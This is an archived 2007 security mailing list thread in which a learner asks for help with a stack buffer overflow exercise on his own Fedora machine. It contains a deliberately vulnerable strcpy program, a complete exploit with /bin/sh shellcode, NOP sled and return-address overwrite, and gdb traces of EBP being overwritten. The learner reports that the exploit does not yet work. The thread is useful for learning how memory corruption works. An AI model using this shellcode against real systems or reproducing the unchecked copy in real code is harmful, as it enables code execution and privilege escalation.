Security Basics mailing list archives
RE: stack overflow help ..
From: gaurav saha <gauravsaha007 () yahoo com>
Date: Sun, 28 Jan 2007 03:43:44 -0800 (PST)
yes I read .. if i write more 4 bytes ..it over writes teh *saved* eip .. right ?? ========= vul1.c ======== [root@winmitm ~]# more a1.c f(char *str) { char a[1024]; strcpy(a,str); } main(int argc,char *argv[1]) { if(argc>1) f(argv[1]); } ====== end of code === my exploit code which i wrote for this was .. ===== exploit1.c ====== #include <stdio.h> #include <string.h> #define lv_size 1024 #define offset 30+lv_size+8*4 long get_sp() { __asm__("movl %esp, %eax"); } int main(int argc, char **argv) { char execshell[] = "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f" "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd" "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh"; char buffer[lv_size+4*8]; unsigned long *ptr2 = NULL; char *ptr = NULL; int i; printf("1..\n"); // Filling with null for(i=0;i<lv_size+4*8;i++) buffer[i]=0x00; ptr=buffer; printf("2..\n"); // Filling with NOPs for(i=0;i<lv_size-strlen(execshell);i++) *(ptr++)=0x90; printf("3..\n"); // Filling with shellcode for(i=0;i<strlen(execshell);i++) *(ptr++)=execshell[i]; printf("4..\n"); // ptr2 pointing to ptr ptr2=(long *)ptr; printf("5..\n"); // Filling with address for(i=1;i<2;i++) *(ptr2++)=get_sp()+offset; execl("/root/vul1", "vul1", buffer, NULL); } ======== end of my exploit code ======= [root@winmitm ~]# cc expl1.c -o exploit [root@winmitm ~]# ./exploit 1.. 2.. 3.. 4.. 5.. get_sp=bfffe568 and len=4 get_sp+offset=bfffe9a6 and len=4 6.. buffer:<�^^ 3VV45V4N �3��/bin/sh�> [root@winmitm ~]# this is what i get ... can u please guide me on what i am doing wrong ?? thanks ----gaurav --- "Krpata, Tyler" <tkrpata () bjs com> wrote:
Do an "info frame" in gdb. Remember that you are trying, actually, to overwrite the *saved* EIP value.-----Original Message----- From: listbounce () securityfocus com[mailto:listbounce () securityfocus com]On Behalf Of gaurav saha Sent: Thursday, January 25, 2007 6:27 PM To: security-basics () securityfocus com Subject: stack overflow help .. Hi, i am new to this stack overflow issue. i am using fc3 (kernel 2.6.12-1.1381) i have modified this few sysctl keys to thesevalues.kernel.overflowgid = 0 kernel.overflowuid = 0 fs.overflowgid = 0 fs.overflowuid = 0 kernel.randomize_va_space = 0 i am still unable to overwrite EIP ========= vuln1.c =========== int main(int argc, char **argv) { char buf[1024]; strcpy(buf, argv[1]); return 0; } ====== end of vuln1.c ======= $gcc -ggdb vuln1.c -o v1 $gdb ./v1 . . . . (gdb) run `perl -e 'print "A"x1024'` Starting program: /home/gaurav/test/challenges/challenges/buf/v1`perl-e 'print "A"x1024'` Reading symbols from shared object read fromtargetmemory...(no debugging symbols found)...done. Loaded system supplied DSO at 0xb5c000 (no debugging symbols found)...(no debuggingsymbolsfound)... Program exited with code 0120. (gdb) run `perl -e 'print "A"x1028'` warning: cannot close "shared object read fromtargetmemory": File in wrong format Starting program: /home/gaurav/test/challenges/challenges/buf/v1`perl-e 'print "A"x1028'` Reading symbols from shared object read fromtargetmemory...(no debugging symbols found)...done. Loaded system supplied DSO at 0x247000 (no debugging symbols found)...(no debuggingsymbolsfound)... Program exited with code 0100. (gdb) run `perl -e 'print "A"x1036'` warning: cannot close "shared object read fromtargetmemory": File in wrong format Starting program: /home/gaurav/test/challenges/challenges/buf/v1`perl-e 'print "A"x1036'` Reading symbols from shared object read fromtargetmemory...(no debugging symbols found)...done. Loaded system supplied DSO at 0x807000 (no debugging symbols found)...(no debuggingsymbolsfound)... Program received signal SIGSEGV, Segmentationfault.0x00ac8e0d in __libc_start_main () from /lib/tls/libc.so.6 (gdb) info reg . . ebx 0xbdaff4 12431348 esp 0xbffff350 0xbffff350 ebp 0x41414141 0x41414141 esi 0xbffff3d4 -1073744940 edi 0xbffff360 -1073745056 eip 0xac8e0d 0xac8e0d eflags 0x210286 2163334 . . (gdb) run `perl -e 'print "A"x1040'` Program received signal SIGSEGV, Segmentationfault.0x080483a2 in main () (gdb) i r ebp 0x41414141 0x41414141 eip 0x80483a2 0x80483a2 (gdb) run `perl -e 'print "A"x1044'` Program received signal SIGSEGV, Segmentationfault.0x080483a2 in main () (gdb) i r ebp 0x41414141 0x41414141 eip 0x80483a2 0x80483a2 (gdb) run `perl -e 'print "A"x1048'` Program received signal SIGSEGV, Segmentationfault.0x080483a2 in main () (gdb) i r ebp 0x41414141 0x41414141 eip 0x80483a2 0x80483a2 (gdb) run `perl -e 'print "A"x1052'` Program received signal SIGSEGV, Segmentationfault.0x080483a2 in main () (gdb) i r ebp 0x41414141 0x41414141 eip 0x80483a2 0x80483a2 (gdb) run `perl -e 'print "A"x1056'` Program received signal SIGSEGV, Segmentationfault.0x080483a2 in main () (gdb) i r ebp 0x41414141 0x41414141 eip 0x80483a2 0x80483a2 and this keeps continuing ... no matter how many i increase ... and i can't figure out what problem it is ... thanks and adieu ----gaurav
________________________________________________________________________
____________ Now that's room service! Choose from over 150,000hotelsin 45,000 destinations on Yahoo! Travel to findyour fit.http://farechase.yahoo.com/promo-generic-14795097
____________________________________________________________________________________ Looking for earth-friendly autos? Browse Top Cars by "Green Rating" at Yahoo! Autos' Green Center. http://autos.yahoo.com/green_center/
Current thread:
- stack overflow help .. gaurav saha (Jan 26)
- Re: stack overflow help .. Deian Stefan (Jan 29)
- <Possible follow-ups>
- RE: stack overflow help .. Krpata, Tyler (Jan 26)
- RE: stack overflow help .. gaurav saha (Jan 29)
- RE: stack overflow help .. gaurav saha (Jan 29)